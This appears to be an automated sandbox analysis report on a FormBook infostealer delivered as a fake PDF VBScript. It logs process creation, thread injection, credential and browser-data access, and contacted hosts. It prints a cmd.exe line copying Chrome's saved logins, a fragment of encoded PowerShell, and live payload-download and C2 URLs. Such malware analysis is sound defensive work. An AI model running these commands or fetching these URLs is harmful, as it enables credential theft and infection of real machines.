mAG8AOQAgAGMAbABvAGMAawByAGEAIABMAEkATQBCACAATwB2AGUAcgBtADYAIABIAHkAcABlAHIAIABEAGkAcwBkAGEAaQBuACAAbgBvAG4AYwBvAG4AIAB0AG8AbABkAGEAdAB0AGUAcwAgAFMAdQBsAGMAYQAgAE8AcAByAGUAdABoAG8AbAAgAGgAbwBsAG8AY Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lmt3yvf4\lmt3yvf4.cmdline Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES843C.tmp" "c:\Users\user\AppData\Local\Temp\lmt3yvf4\CSC3B7445246D634A3891EBDF5913136B1.TMP" Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: explorer.exe, 00000021.00000000.860230631.0000000001870000.00000002.00020000.sdmp, smartscreen.exe, 00000025.00000002.892004316.00000269355B0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000019.00000000.739199824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.728941774.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000019.00000000.716350239.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.741324415.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000019.00000000.698522282.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.748100081.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000019.00000000.707314759.00000000083E0000.00000004.00000001.sdmp, explorer.exe, 00000021.00000000.860230631.0000000001870000.00000002.00020000.sdmp, explorer.exe, 00000021.00000003.853429255.00000000050D7000.00000004.00000001.sdmp, explorer.exe, 00000021.00000000.863772937.00000000050D2000.00000004.00000001.sdmp, explorer.exe, 00000021.00000000.865096113.00000000053D0000.00000004.00000001.sdmp, smartscreen.exe, 00000025.00000002.892004316.00000269355B0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000019.00000000.739199824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.715467912.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000019.00000000.698036183.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000019.00000000.716350239.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.698522282.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.738642393.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000021.00000000.860230631.0000000001870000.00000002.00020000.sdmp, explorer.exe, 00000021.00000000.863772937.00000000050D2000.00000004.00000001.sdmp, explorer.exe, 00000021.00000000.859197803.00000000011D8000.00000004.00000020.sdmp, explorer.exe, 00000021.00000000.865096113.00000000053D0000.00000004.00000001.sdmp, smartscreen.exe, 00000025.00000002.892004316.00000269355B0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000021.00000000.860230631.0000000001870000.00000002.00020000.sdmp, smartscreen.exe, 00000025.00000002.892004316.00000269355B0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd#327721
Source: explorer.exe, 00000019.00000000.739199824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.716350239.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.698522282.0000000000EE0000.00000002.00020000.sdmp Binary or memory string: &Program Manager
Source: explorer.exe, 00000019.00000000.739199824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.716350239.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000019.00000000.698522282.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000021.00000000.860230631.0000000001870000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection
barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\SysWOW64\help.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\SysWOW64\help.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 00000019.00000000.733105957.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000000.750582708.000000000DF1B000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.777224574.00000000028A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.781396856.000000001E7B0000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 557834 Sample: Wire-84844663637346665.PDF.vbs Startdate: 21/01/2022 Architecture: WINDOWS Score: 100 54 canonicalizer.ucsuri.tcs 2->54 70 Found malware configuration 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 Multi AV Scanner detection for submitted file 2->74 76 9 other signatures 2->76 12 wscript.exe 2 2->12         started        15 smartscreen.exe 2->15         started        signatures3 process4 signatures5 88 VBScript performs obfuscated calls to suspicious functions 12->88 90 Wscript starts Powershell (via cmd or directly) 12->90 92 Very long command line found 12->92 94 Encrypted powershell cmdline option found 12->94 17 powershell.exe 25 12->17         started        process6 signatures7 58 Tries to detect Any.run 17->58 60 Hides threads from debuggers 17->60 20 ieinstal.exe 6 17->20         started        24 csc.exe 3 17->24         started        27 conhost.exe 17->27         started        process8 dnsIp9 56 research.the-miyanichi.co.jp 133.242.141.149, 443, 49841 SAKURA-ASAKURAInternetIncJP Japan 20->56 78 Modifies the context of a thread in another process (thread injection) 20->78 80 Tries to detect Any.run 20->80 82 Maps a DLL or memory area into another process 20->82 84 3 other signatures 20->84 29 explorer.exe 3 20->29 injected 52 C:\Users\user\AppData\Local\...\lmt3yvf4.dll, PE32 24->52 dropped 31 cvtres.exe 1 24->31         started        file10 signatures11 process12 process13 33 help.exe 1 18 29->33         started        37 ieinstal.exe 29->37         started        39 ieinstal.exe 29->39         started        file14 48 C:\Users\user\AppData\...486Alogrv.ini, data 33->48 dropped 50 C:\Users\user\AppData\...506Alogri.ini, data 33->50 dropped 62 Detected FormBook malware 33->62 64 Tries to steal Mail credentials (via file / registry access) 33->64 66 Tries to harvest and steal browser information (history, passwords, etc) 33->66 68 3 other signatures 33->68 41 cmd.exe 2 33->41         started        44 explorer.exe 127 33->44         started        signatures15 process16 signatures17 86 Tries to harvest and steal browser information (history, passwords, etc) 41->86 46 conhost.exe 41->46         started        process18
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
133.242.141.149
 research.the-miyanichi.co.jp Japan 7684 SAKURA-ASAKURAInternetIncJP true

Contacted Domains

Name IP Active
research.the-miyanichi.co.jp 133.242.141.149 true
canonicalizer.ucsuri.tcs unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://research.the-miyanichi.co.jp/wp-^ true
  • Avira URL Cloud: safe
 unknown
www.recountsol.xyz/ty13/ true
  • Avira URL Cloud: safe
 low
https://research.the-miyanichi.co.jp/wp-content/uploads/bin_GuOImF134.bin false
  • Avira URL Cloud: safe
 unknown